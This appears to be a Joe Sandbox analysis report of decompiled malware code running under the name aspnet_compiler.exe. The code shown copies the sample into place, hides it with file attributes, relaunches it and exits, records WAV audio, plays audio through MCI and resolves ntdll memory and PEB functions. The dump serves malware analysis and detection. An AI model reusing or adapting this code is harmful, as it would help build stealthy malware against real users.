                					_t125 = E004087F0( &_v24, 0x473250, 0x473250, "\\");
                					_t70 = E00402FF4(_a4,  &_v48, _t69, _t130, 0x473250, _t139, _t73);
                					_t131 = 0x473220;
                					E00401EF3(0x473220, _t69, 0x473220, _t70);
                					E00401EE9();
                				}
                				E00401EE9();
                				if(E0043E224(E00401EE4(_t131), 0x470b38, _t26) != 0) {
                					_t28 = E00401EE4(_t131);
                					_t134 = CopyFileW;
                					_t29 = CopyFileW(0x470b38, _t28, 0);
                					__eflags = _t29;
                					if(_t29 != 0) {
                						L14:
                						_push(E00401EE4(0x473208));
                						E0040C21B(0x473208);
                						__eflags = _a8 - 1;
                						if(_a8 == 1) {
                							_t43 = E00401EE4(_t131);
                							_t73 = SetFileAttributesW;
                							SetFileAttributesW(_t43, 7);
                							_t45 = E0043A3D6(_t130);
                							__eflags = _t45;
                							if(_t45 != 0) {
                								SetFileAttributesW(E00401EE4(0x473250), 7);
                							}
                						}
                						__eflags = _a12;
                						if(_a12 != 0) {
                							E0040415E(_t73, _t135 - 0x1c, _t125, _t134, "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe");
                							_push(L"del");
                							E00412AFC(0x80000001, E00401EE4(E0041A7B9( &_v28, 0x473238)));
                							E00401EE9();
                						}
                						CloseHandle( *0x470d44);
                						_t35 = ShellExecuteW(0, L"open", E00401EE4(_t131), 0x46a8f0, 0x46a8f0, 1);
                						__eflags = _t35 - 0x20;
                						if(_t35 > 0x20) {
                							ExitProcess(0);
                						} else {
                							E0040C577();
                							L13:
                							return 0;
                						}
                					}
                					__eflags = _v49 - 0x36;
                					if(_v49 == 0x36) {
                						goto L14;
                					}
                					_t48 = E0043A3D6(_t130);
                					_t125 = 0x36;
                					__eflags = _t48;
                					if(_t48 == 0) {
                						E00401EF3(_t131, 0x36, _t131, E0040CF38( &_v24, 0x36, _t73));
                					} else {
                						E00401EF3(0x473250, 0x36, _t131, E0040CF38( &_v24, 0x36, _t130));
                						E00401EE9();
                						_t125 = E004087F0( &_v52, 0x473250, CopyFileW, "\\");
                						E00401EF3(_t131, _t60, _t131, E00402FF4(_t73,  &_v28, _t60, _t130, CopyFileW, __eflags, _t73));
                						E00401EE9();
                					}
                					E00401EE9();
                					CreateDirectoryW(E00401EE4(0x473250), 0);
                					_t54 = E00401EE4(_t131);
                					_t73 = 0x470b38;
                					_t55 = CopyFileW(0x470b38, _t54, 0);
                					__eflags = _t55;
                					if(_t55 != 0) {
                						goto L14;
                					} else {
                						L004086CB(0x470b38, _t131, _t125, 0x470b38);
                						goto L13;
                					}
                				} else {
                					_push(E00401EE4(0x473208));
                					E0040C21B(0x473208);
                					return 1;
                				}
                 			}

                APIs
                • _wcslen.LIBCMT ref: 0040C315
                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00473298,0000000B,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040C32E
                • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000000,00000000,00000000,00000000,00000000,?,00473298,0000000B,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040C3DE
                • _wcslen.LIBCMT ref: 0040C3F4
                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040C47C
                • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000000,00000000), ref: 0040C492
                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040C4D1
                • _wcslen.LIBCMT ref: 0040C4D4
                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040C4EB
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00473298,0000000B), ref: 0040C53B
                • ShellExecuteW.SHELL32(00000000,open,00000000,0046A8F0,0046A8F0,00000001), ref: 0040C559
                • ExitProcess.KERNEL32 ref: 0040C570
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                • String ID: 2G$ 2G$6$82G$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$P2G$P2G$P2G$P2G$P2G$del$open
                • API String ID: 1579085052-2098281891
                • Opcode ID: 65248ef6e73eb4e28b7d54744e4bb54038e4efd798751719faaa7fc6d2eeb99b
                • Instruction ID: 2a47eddb00df912b126377051a92c71841ea904bf6b40c506a6d22bed5b78104
                • Opcode Fuzzy Hash: 65248ef6e73eb4e28b7d54744e4bb54038e4efd798751719faaa7fc6d2eeb99b
                • Instruction Fuzzy Hash: 3E51C461204340ABD614B7B2EC92A7F2399AF90708F10843FF805A62D3DF7C9D0592AF
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 87%
                			E00419BA2(void* __ecx, void* __edx, char _a4) {
                				char _v28;
                				char _v52;
                				char _v76;
                				char _v100;
                				char _v124;
                				void* _v128;
                				char _v176;
                				char _v192;
                				void* _v216;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				void* _t23;
                				void* _t26;
                				void* _t41;
                				long _t45;
                				void* _t61;
                				void* _t65;
                				void* _t108;
                				void* _t110;
                				void* _t112;
                				void* _t114;
                
                				_t101 = __edx;
                				_t114 =  &_v124;
                				_t108 = __ecx;
                				_t110 = __edx;
                				if(E00419DF7( &_a4, __ecx, __ecx) == 0xffffffff) {
                					_t61 = E00401EE4( &_a4);
                					_t101 = 0x30;
                					E00401EF3( &_a4, 0x30, _t110, E0040CF38( &_v124, 0x30, _t61));
                					E00401EE9();
                				}
                				_t23 = E0040245C();
                				_t119 = _t23;
                				if(_t23 == 0) {
                					__eflags = PathFileExistsW(E00401EE4( &_a4));
                					if(__eflags != 0) {
                						goto L4;
                					} else {
                						E00402073(_t65, _t114 - 0x18, _t101, _t112, 0x464074);
                						_push(0xa8);
                						E00404A81(0x4738d0, _t101, __eflags);
                					}
                				} else {
                					E0041AE6B(_t110, E00401EE4( &_a4));
                					L4:
                					_t26 = E0041A7B9( &_v28, _t108);
                					_t106 = E00402F85( &_v124, E00402FF4(_t65,  &_v76, E0040AEF6( &_v52, L"open \"", _t112,  &_a4), _t108, _t112, _t119, L"\" type "), _t26);
                					E00402FF4(_t65,  &_v100, _t30, _t108, _t112, _t119, L" alias audio");
                					E00401EE9();
                					E00401EE9();
                					E00401EE9();
                					E00401EE9();
                					mciSendStringW(E00401EE4( &_v100), 0, 0, 0);
                					mciSendStringA("play audio", 0, 0, 0);
                					_t115 = _t114 - 0x18;
                					E00402073(0, _t114 - 0x18, _t30, _t112, 0x464074);
                					_push(0xa9);
                					E00404A81(0x4738d0, _t106, 0);
                					_t41 = CreateEventA(0, 1, 0, 0);
                					while(1) {
                						L5:
                						 *0x472acc = _t41;
                						while(1) {
                							_t121 = _t41;
                							if(_t41 == 0) {
                								break;
                							}
                							__eflags =  *0x472ac9;
                							if( *0x472ac9 != 0) {
                								mciSendStringA("pause audio", 0, 0, 0);
                								 *0x472ac9 = 0;
                							}
                							__eflags =  *0x472ac8;
                							if( *0x472ac8 != 0) {
                								mciSendStringA("resume audio", 0, 0, 0);
                								 *0x472ac8 = 0;
                							}
                							mciSendStringA("status audio mode",  &_v176, 0x14, 0);
                							_t45 = E0043E5D0( &_v192, "stopped");
                							__eflags = _t45;
                							if(_t45 == 0) {
                								SetEvent( *0x472acc);
                							}
                							__eflags = WaitForSingleObject( *0x472acc, 0x1f4);
                							if(__eflags != 0) {
                								_t41 =  *0x472acc;
                							} else {
                								CloseHandle( *0x472acc);
                								_t41 = 0;
                								goto L5;
                							}
                						}
                						mciSendStringA("stop audio", 0, 0, 0);
                						mciSendStringA("close audio", 0, 0, 0);
                						E00402073(0, _t115 - 0x18, _t106, 0x4738d0, 0x464074);
                						_push(0xaa);
                						E00404A81(0x4738d0, _t106, _t121);
                						E00401EE9();
                						goto L19;
                					}
                				}
                				L19:
                				return E00401EE9();
                			}


                APIs
                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 00419C97
                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00419CAB
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00464074), ref: 00419CD3
                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00472EC8,00000000), ref: 00419CE9
                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00419D2A
                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 00419D42
                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 00419D57
                • SetEvent.KERNEL32 ref: 00419D74
                • WaitForSingleObject.KERNEL32(000001F4), ref: 00419D85
                • CloseHandle.KERNEL32 ref: 00419D95
                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00419DB7
                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 00419DC1
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                • API String ID: 738084811-1354618412
                • Opcode ID: b956aa6423b5bcbcb2845cea5496d9274bc1e9175a2476133d7623f69dfd2c96
                • Instruction ID: 455b6cfaa5a4d4cea25ac99553b3555d96430d1d1c5ac1129c3b59e21b3d00b1
                • Opcode Fuzzy Hash: b956aa6423b5bcbcb2845cea5496d9274bc1e9175a2476133d7623f69dfd2c96
                • Instruction Fuzzy Hash: 8751C5712442056FD214F761EC92EAF369DEB80348F10443FF546A21E2EE789D898A6F
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 92%
                			E00401A4D(WCHAR* __ecx, signed int __edx) {
                				void _v4;
                				void _v8;
                				void _v12;
                				void _v16;
                				void _v20;
                				void _v24;
                				long _v28;
                				signed int _t36;
                				void** _t75;
                				signed int _t80;
                				void* _t81;
                				signed int _t83;
                
                				_t75 = __edx;
                				_t80 =  *0x470aaa & 0x0000ffff;
                				_t83 = ( *0x470ab6 & 0x0000ffff) * _t80;
                				_v16 = 1;
                				_v20 = 0x10;
                				_v12 = _t83 *  *0x470aac >> 3;
                				asm("cdq");
                				_v8 = _t83 + (__edx & 0x00000007) >> 3;
                				_t5 =  &(_t75[1]); // 0x0
                				_t36 =  *_t5 * _t80;
                				_v4 = _t36;
                				_v24 = _t36 + 0x24;
                				_t81 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
                				if(_t81 != 0xffffffff) {
                					_push(0);
                					WriteFile(_t81, "RIFF", 0, 4,  &_v28);
                					WriteFile(_t81,  &_v24, 0,  &_v28, 0);
                					WriteFile(_t81, "WAVE", 0,  &_v28, 0);
                					WriteFile(_t81, "fmt ", 0,  &_v28, 0);
                					WriteFile(_t81,  &_v20, 0,  &_v28, 0);
                					WriteFile(_t81,  &_v16, 2,  &_v28, 0);
                					WriteFile(_t81, 0x470aaa, 2,  &_v28, 0);
                					WriteFile(_t81, 0x470aac, 0,  &_v28, 0);
                					WriteFile(_t81,  &_v12, 0,  &_v28, 0);
                					WriteFile(_t81,  &_v8, 2,  &_v28, 0);
                					WriteFile(_t81, 0x470ab6, 2,  &_v28, 0);
                					WriteFile(_t81, "data", 0,  &_v28, 0);
                					WriteFile(_t81,  &_v4, 0,  &_v28, 0);
                					_t28 =  &(_t75[1]); // 0x0
                					WriteFile(_t81,  *_t75,  *_t28,  &_v28, 0);
                					CloseHandle(_t81);
                					return 1;
                				}
                				return 0;
                			}


                APIs
                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AE3
                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AF3
                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B03
                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B13
                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B23
                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B34
                • WriteFile.KERNEL32(00000000,00470AAA,00000002,00000000,00000000), ref: 00401B45
                • WriteFile.KERNEL32(00000000,00470AAC,00000004,00000000,00000000), ref: 00401B55
                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B65
                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B76
                • WriteFile.KERNEL32(00000000,00470AB6,00000002,00000000,00000000), ref: 00401B87
                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B97
                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BA7
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: File$Write$Create
                • String ID: RIFF$WAVE$data$fmt
                • API String ID: 1602526932-4212202414
                • Opcode ID: e9244d672c59e0ffd74479715dd62bb2a6f89e2f1e0128d42166dc8543c173f0
                • Instruction ID: bbc7d4a3c977ff0e2710d2a536ed23c0b0e069a4161f47bce29e1ad9506f00c9
                • Opcode Fuzzy Hash: e9244d672c59e0ffd74479715dd62bb2a6f89e2f1e0128d42166dc8543c173f0
                • Instruction Fuzzy Hash: 8D412EB2654318BAE210DE51DD85FBB7EECEB85B50F40441AFA44D60C0D7A4E909DBB3
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004068E4() {
                				_Unknown_base(*)()* _t4;
                				_Unknown_base(*)()* _t6;
                				_Unknown_base(*)()* _t9;
                				_Unknown_base(*)()* _t11;
                				_Unknown_base(*)()* _t13;
                				_Unknown_base(*)()* _t15;
                				WCHAR* _t17;
                
                				_t17 = L"ntdll.dll";
                				_t4 = GetProcAddress(GetModuleHandleW(_t17), "RtlInitUnicodeString");
                				 *0x470afc = _t4;
                				if(_t4 != 0) {
                					_t6 = GetProcAddress(GetModuleHandleW(_t17), "NtAllocateVirtualMemory");
                					 *0x470b00 = _t6;
                					if(_t6 == 0) {
                						goto L1;
                					}
                					_t9 = GetProcAddress(GetModuleHandleW(_t17), "NtFreeVirtualMemory");
                					 *0x470b0c = _t9;
                					if(_t9 == 0) {
                						goto L1;
                					}
                					_t11 = GetProcAddress(GetModuleHandleW(_t17), "RtlAcquirePebLock");
                					 *0x470b04 = _t11;
                					if(_t11 == 0) {
                						goto L1;
                					}
                					_t13 = GetProcAddress(GetModuleHandleW(_t17), "RtlReleasePebLock");
                					 *0x470b10 = _t13;
                					if(_t13 == 0) {
                						goto L1;
                					}
                					_t15 = GetProcAddress(GetModuleHandleW(_t17), "LdrEnumerateLoadedModules");
                					 *0x470af8 = _t15;
                					return 0 | _t15 != 0x00000000;
                				}
                				L1:
                				return 0;
                			}


                APIs
                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000001,00406CC1,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000003,00406CE9,00473220,00406D42), ref: 004068F8
                • GetProcAddress.KERNEL32(00000000), ref: 00406901
                • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 00406916
                • GetProcAddress.KERNEL32(00000000), ref: 00406919
                • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 0040692A
                • GetProcAddress.KERNEL32(00000000), ref: 0040692D
                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 0040693E
                • GetProcAddress.KERNEL32(00000000), ref: 00406941
                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00406952
                • GetProcAddress.KERNEL32(00000000), ref: 00406955
                • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 00406966
                • GetProcAddress.KERNEL32(00000000), ref: 00406969
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                • API String ID: 1646373207-3272542945
                • Opcode ID: c5d62d6da54eaf1f5e298c1ce3456973680903e04872b744077958239b2d5770
                • Instruction ID: df219cf26e896b26ca7b17cc0f8dfcb6cf109bc3019751d44b8154791cbbdf11
                • Opcode Fuzzy Hash: c5d62d6da54eaf1f5e298c1ce3456973680903e04872b744077958239b2d5770
                • Instruction Fuzzy Hash: 190175E1A4130AAADB10777A6C58D476EDC9EA13503120937B405E2691EEBCD8908D6C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 87%
                			E0044DCAD(signed int _a4, signed int _a8) {
                				signed int _v0;
                				signed char _v5;
                				intOrPtr _v8;
                				signed char _v9;
                				signed int _v12;
                				signed int _v16;
                				signed int _v20;
                				intOrPtr _v24;
                				signed int _v44;
                				signed int _v92;
                				signed int _v128;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				signed int _t116;
                				signed int _t119;
                				signed int _t120;
                				signed int _t122;
                				signed int _t123;
                				signed int _t126;
                				signed int _t127;
                				signed int _t131;
                				signed int _t133;
                				signed int _t136;
                				signed int _t138;
                				signed int _t139;
                				signed int _t142;
                				void* _t143;
                				signed int _t148;
                				signed int* _t150;
                				signed int* _t156;
                				signed int _t163;
                				signed int _t165;
                				signed int _t167;
                				intOrPtr _t168;
                				signed int _t173;
                				signed int _t175;
                				signed int _t176;
                				signed int _t180;
                				signed int _t185;
                				intOrPtr* _t186;
                				signed int _t191;
                				signed int _t196;
                				signed int _t197;
                				signed int _t204;
                				intOrPtr* _t205;
                				signed int _t214;
                				signed int _t215;
                				signed int _t217;
                				signed int _t218;
                				signed int _t220;
                				signed int _t221;
                				signed int _t223;
                				intOrPtr _t225;
                				void* _t231;
                				signed int _t233;
                				void* _t236;
                				signed int _t237;
                				signed int _t238;
                				void* _t241;
                				signed int _t244;
                				signed int _t246;
                				void* _t252;
                				signed int _t253;
                				signed int _t254;
                				void* _t260;
                				void* _t262;
                				signed int _t263;
                				intOrPtr* _t267;
                				intOrPtr* _t271;
                				signed int _t274;
                				signed int _t276;
                				signed int _t280;
                				signed int _t282;
                				void* _t283;
                				void* _t284;
                				void* _t285;
                				signed int _t286;
                				signed int _t288;
                				signed int _t290;
                				signed int _t291;
                				signed int* _t292;
                				signed int _t298;
                				signed int _t299;
                				CHAR* _t300;
                				signed int _t302;
                				signed int _t303;
                				WCHAR* _t304;
                				signed int _t305;
                				signed int _t306;
                				signed int* _t307;
                				signed int _t308;
                				signed int _t310;
                				void* _t316;
                				void* _t317;
                				void* _t318;
                				void* _t320;
                				void* _t321;
                				void* _t322;
                				void* _t323;
                
                				_t217 = _a4;
                				if(_t217 != 0) {
                					_t286 = _t217;
                					_t116 = E004371B0(_t217, 0x3d);
                					_v16 = _t116;
                					_t231 = _t285;
                					__eflags = _t116;
                					if(_t116 == 0) {
                						L10:
                						 *((intOrPtr*)(E0043EEAD())) = 0x16;
                						goto L11;
                					} else {
                						__eflags = _t116 - _t217;
                						if(_t116 == _t217) {
                							goto L10;
                						} else {
                							__eflags =  *((char*)(_t116 + 1));
                							_t298 =  *0x4704e0; // 0x13f4478
                							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
                							_v5 = _t120;
                							__eflags = _t298 -  *0x4704ec; // 0x13f4478
                							if(__eflags == 0) {
                								L87();
                								_t298 = _t120;
                								_t120 = _v5;
                								_t231 = _t298;
                								 *0x4704e0 = _t298;
                							}
                							_t218 = 0;
                							__eflags = _t298;
                							if(_t298 != 0) {
                								L21:
                								_t233 = _t286;
                								_t122 = _v16 - _t233;
                								_push(_t122);
                								_push(_t233);
                								L121();
                								_v12 = _t122;
                								__eflags = _t122;
                								if(_t122 < 0) {
                									L29:
                									__eflags = _v5 - _t218;
                									if(_v5 != _t218) {
                										goto L12;
                									} else {
                										_t123 =  ~_t122;
                										_v12 = _t123;
                										_t27 = _t123 + 2; // 0x2
                										_t236 = _t27;
                										__eflags = _t236 - _t123;
                										if(_t236 < _t123) {
                											goto L11;
                										} else {
                											__eflags = _t236 - 0x3fffffff;
                											if(_t236 >= 0x3fffffff) {
                												goto L11;
                											} else {
                												_push(4);
                												_push(_t236);
                												_t299 = E0044E355(_t298);
                												E00445002(_t218);
                												_t320 = _t320 + 0x10;
                												__eflags = _t299;
                												if(_t299 == 0) {
                													goto L11;
                												} else {
                													_t237 = _v12;
                													_t286 = _t218;
                													_t126 = _a4;
                													 *(_t299 + _t237 * 4) = _t126;
                													 *(_t299 + 4 + _t237 * 4) = _t218;
                													goto L34;
                												}
                											}
                										}
                									}
                								} else {
                									__eflags =  *_t298 - _t218;
                									if( *_t298 == _t218) {
                										goto L29;
                									} else {
                										E00445002( *((intOrPtr*)(_t298 + _t122 * 4)));
                										_t282 = _v12;
                										__eflags = _v5 - _t218;
                										if(_v5 != _t218) {
                											while(1) {
                												__eflags =  *(_t298 + _t282 * 4) - _t218;
                												if( *(_t298 + _t282 * 4) == _t218) {
                													break;
                												}
                												 *(_t298 + _t282 * 4) =  *(_t298 + 4 + _t282 * 4);
                												_t282 = _t282 + 1;
                												__eflags = _t282;
                											}
                											_push(4);
                											_push(_t282);
                											_t299 = E0044E355(_t298);
                											E00445002(_t218);
                											_t320 = _t320 + 0x10;
                											_t126 = _t286;
                											__eflags = _t299;
                											if(_t299 != 0) {
                												L34:
                												 *0x4704e0 = _t299;
                											}
                										} else {
                											_t126 = _a4;
                											_t286 = _t218;
                											 *(_t298 + _t282 * 4) = _t126;
                										}
                										__eflags = _a8 - _t218;
                										if(_a8 == _t218) {
                											goto L12;
                										} else {
                											_t238 = _t126;
                											_t283 = _t238 + 1;
                											do {
                												_t127 =  *_t238;
                												_t238 = _t238 + 1;
                												__eflags = _t127;
                											} while (_t127 != 0);
                											_v12 = _t238 - _t283 + 2;
                											_t300 = E004443F4(_t238 - _t283, _t238 - _t283 + 2, 1);
                											_pop(_t241);
                											__eflags = _t300;
                											if(_t300 == 0) {
                												L42:
                												E00445002(_t300);
                												goto L12;
                											} else {
                												_t131 = E0044030E(_t300, _v12, _a4);
                												_t321 = _t320 + 0xc;
                												__eflags = _t131;
                												if(_t131 != 0) {
                													_push(_t218);
                													_push(_t218);
                													_push(_t218);
                													_push(_t218);
                													_push(_t218);
                													E0043A5E8();
                													asm("int3");
                													_t316 = _t321;
                													_t322 = _t321 - 0xc;
                													_push(_t218);
                													_t220 = _v44;
                													__eflags = _t220;
                													if(_t220 != 0) {
                														_push(_t300);
                														_push(_t286);
                														_push(0x3d);
                														_t288 = _t220;
                														_t133 = E00456277(_t241);
                														_v20 = _t133;
                														_t244 = _t220;
                														__eflags = _t133;
                														if(_t133 == 0) {
                															L54:
                															 *((intOrPtr*)(E0043EEAD())) = 0x16;
                															goto L55;
                														} else {
                															__eflags = _t133 - _t220;
                															if(_t133 == _t220) {
                																goto L54;
                															} else {
                																_t302 =  *0x4704e4; // 0x13fb350
                																_t221 = 0;
                																__eflags =  *(_t133 + 2);
                																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
                																_v9 = _t246;
                																__eflags = _t302 -  *0x4704e8; // 0x13f9178
                																if(__eflags == 0) {
                																	_push(_t302);
                																	L104();
                																	_t246 = _v9;
                																	_t302 = _t133;
                																	 *0x4704e4 = _t302;
                																}
                																__eflags = _t302;
                																if(_t302 != 0) {
                																	L64:
                																	_v20 = _v20 - _t288 >> 1;
                																	_t138 = E0044E2E8(_t288, _v20 - _t288 >> 1);
                																	_v16 = _t138;
                																	__eflags = _t138;
                																	if(_t138 < 0) {
                																		L72:
                																		__eflags = _v9 - _t221;
                																		if(_v9 != _t221) {
                																			goto L56;
                																		} else {
                																			_t139 =  ~_t138;
                																			_v16 = _t139;
                																			_t72 = _t139 + 2; // 0x2
                																			_t252 = _t72;
                																			__eflags = _t252 - _t139;
                																			if(_t252 < _t139) {
                																				goto L55;
                																			} else {
                																				__eflags = _t252 - 0x3fffffff;
                																				if(_t252 >= 0x3fffffff) {
                																					goto L55;
                																				} else {
                																					_push(4);
                																					_push(_t252);
                																					_t303 = E0044E355(_t302);
                																					E00445002(_t221);
                																					_t322 = _t322 + 0x10;
                																					__eflags = _t303;
                																					if(_t303 == 0) {
                																						goto L55;
                																					} else {
                																						_t253 = _v16;
                																						_t288 = _t221;
                																						_t142 = _v0;
                																						 *(_t303 + _t253 * 4) = _t142;
                																						 *(_t303 + 4 + _t253 * 4) = _t221;
                																						goto L77;
                																					}
                																				}
                																			}
                																		}
                																	} else {
                																		__eflags =  *_t302 - _t221;
                																		if( *_t302 == _t221) {
                																			goto L72;
                																		} else {
                																			E00445002( *((intOrPtr*)(_t302 + _t138 * 4)));
                																			_t276 = _v16;
                																			__eflags = _v9 - _t221;
                																			if(_v9 != _t221) {
                																				while(1) {
                																					__eflags =  *(_t302 + _t276 * 4) - _t221;
                																					if( *(_t302 + _t276 * 4) == _t221) {
                																						break;
                																					}
                																					 *(_t302 + _t276 * 4) =  *(_t302 + 4 + _t276 * 4);
                																					_t276 = _t276 + 1;
                																					__eflags = _t276;
                																				}
                																				_push(4);
                																				_push(_t276);
                																				_t303 = E0044E355(_t302);
                																				E00445002(_t221);
                																				_t322 = _t322 + 0x10;
                																				_t142 = _t288;
                																				__eflags = _t303;
                																				if(_t303 != 0) {
                																					L77:
                																					 *0x4704e4 = _t303;
                																				}
                																			} else {
                																				_t142 = _v0;
                																				_t288 = _t221;
                																				 *(_t302 + _t276 * 4) = _t142;
                																			}
                																			__eflags = _a4 - _t221;
                																			if(_a4 == _t221) {
                																				goto L56;
                																			} else {
                																				_t254 = _t142;
                																				_t81 = _t254 + 2; // 0x2
                																				_t284 = _t81;
                																				do {
                																					_t143 =  *_t254;
                																					_t254 = _t254 + 2;
                																					__eflags = _t143 - _t221;
                																				} while (_t143 != _t221);
                																				_t82 = (_t254 - _t284 >> 1) + 2; // 0x0
                																				_v16 = _t82;
                																				_t304 = E004443F4(_t254 - _t284 >> 1, _t82, 2);
                																				_pop(_t258);
                																				__eflags = _t304;
                																				if(_t304 == 0) {
                																					L85:
                																					E00445002(_t304);
                																					goto L56;
                																				} else {
                																					_t148 = E004463E1(_t304, _v16, _v0);
                																					_t323 = _t322 + 0xc;
                																					__eflags = _t148;
                																					if(_t148 != 0) {
                																						_push(_t221);
                																						_push(_t221);
                																						_push(_t221);
                																						_push(_t221);
                																						_push(_t221);
                																						E0043A5E8();
                																						asm("int3");
                																						_push(_t316);
                																						_t317 = _t323;
                																						_push(_t288);
                																						_t290 = _v92;
                																						__eflags = _t290;
                																						if(_t290 != 0) {
                																							_t260 = 0;
                																							_t150 = _t290;
                																							__eflags =  *_t290;
                																							if( *_t290 != 0) {
                																								do {
                																									_t150 =  &(_t150[1]);
                																									_t260 = _t260 + 1;
                																									__eflags =  *_t150;
                																								} while ( *_t150 != 0);
                																							}
                																							_t93 = _t260 + 1; // 0x2
                																							_t305 = E004443F4(_t260, _t93, 4);
                																							_t262 = _t304;
                																							__eflags = _t305;
                																							if(_t305 == 0) {
                																								L102:
                																								E004449F5(_t221, _t284, _t290, _t305);
                																								goto L103;
                																							} else {
                																								__eflags =  *_t290;
                																								if( *_t290 == 0) {
                																									L100:
                																									E00445002(0);
                																									_t175 = _t305;
                																									goto L101;
                																								} else {
                																									_push(_t221);
                																									_t221 = _t305 - _t290;
                																									__eflags = _t221;
                																									do {
                																										_t271 =  *_t290;
                																										_t94 = _t271 + 1; // 0x5
                																										_t284 = _t94;
                																										do {
                																											_t176 =  *_t271;
                																											_t271 = _t271 + 1;
                																											__eflags = _t176;
                																										} while (_t176 != 0);
                																										_t262 = _t271 - _t284;
                																										_t95 = _t262 + 1; // 0x6
                																										_v16 = _t95;
                																										 *(_t221 + _t290) = E004443F4(_t262, _t95, 1);
                																										E00445002(0);
                																										_t323 = _t323 + 0xc;
                																										__eflags =  *(_t221 + _t290);
                																										if( *(_t221 + _t290) == 0) {
                																											goto L102;
                																										} else {
                																											_t180 = E0044030E( *(_t221 + _t290), _v16,  *_t290);
                																											_t323 = _t323 + 0xc;
                																											__eflags = _t180;
                																											if(_t180 != 0) {
                																												L103:
                																												_push(0);
                																												_push(0);
                																												_push(0);
                																												_push(0);
                																												_push(0);
                																												E0043A5E8();
                																												asm("int3");
                																												_push(_t317);
                																												_t318 = _t323;
                																												_push(_t262);
                																												_push(_t262);
                																												_push(_t290);
                																												_t291 = _v128;
